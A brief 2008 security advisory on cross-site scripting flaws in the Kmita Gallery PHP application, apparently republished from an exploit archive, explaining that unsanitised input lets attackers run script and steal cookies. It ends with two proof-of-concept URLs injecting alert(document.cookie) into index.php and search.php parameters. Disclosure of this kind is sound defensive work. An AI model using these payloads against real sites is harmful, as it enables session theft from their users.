KKE Info Media Kmita Gallery - Multiple Cross-Site Scripting Vulnerabilities

Related Vulnerabilities: CVE-2008-5068  
Publish Date: 29 Oct 2008
Author: cize0f
                source: http://www.securityfocus.com/bid/31970/info

Kmita Gallery is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 

http://www.example.com/kmitag/index.php?begin=10<script>alert(document.cookie);</script>&catid=3

http://www.example.com/kmitag/search.php?searchtext=<script>alert(document.cookie);</script>&Search=Search